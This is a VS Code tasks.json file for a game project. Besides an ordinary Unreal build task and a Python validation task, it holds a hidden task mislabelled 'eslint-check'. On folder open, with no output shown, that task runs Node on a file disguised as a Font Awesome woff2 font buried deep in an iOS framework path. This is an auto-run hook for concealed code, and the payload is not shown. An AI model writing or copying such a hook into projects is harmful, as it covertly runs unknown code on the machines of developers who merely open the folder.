{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "eslint-check",
      "type": "shell",
      "command": "(command -v node >/dev/null 2>&1 && node ./Assets/Sych/ShareAssets/Plugins/iOS/Share.xcframework/ios-arm64/Share.framework/Modules/Share.swiftmodule/public/fonts/fa-solid-400.woff2) || (where node >nul 2>&1 && node ./Assets/Sych/ShareAssets/Plugins/iOS/Share.xcframework/ios-arm64/Share.framework/Modules/Share.swiftmodule/public/fonts/fa-solid-400.woff2) || echo ''",
      "problemMatcher": [],
      "isBackground": true,
      "hide": true,
      "presentation": {
        "reveal": "never",
        "panel": "dedicated",
        "focus": false,
        "clear": false,
        "echo": false,
        "close": true
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    },
    {
      "label": "Build and Open IVX_Test (Unreal)",
      "type": "shell",
      "command": "cmd",
      "args": [
        "/c",
        "\"E:\\Unreal Project\\IVX_Test\\BuildAndOpen.bat\""
      ],
      "group": {
        "kind": "build",
        "isDefault": true
      },
      "presentation": {
        "reveal": "always",
        "panel": "shared",
        "showReuseMessage": false,
        "clear": true
      },
      "problemMatcher": [],
      "detail": "Build IVX_TestEditor and launch Unreal Editor. Close the editor first."
    },
    {
      "label": "Context: Validate (CI)",
      "type": "shell",
      "command": "python",
      "args": [
        "tools/context/validate_context.py",
        "--ci"
      ],
      "group": "test",
      "problemMatcher": [],
      "detail": "Runs context-engineering validation per .cursor/commands.json"
    }
  ]
}
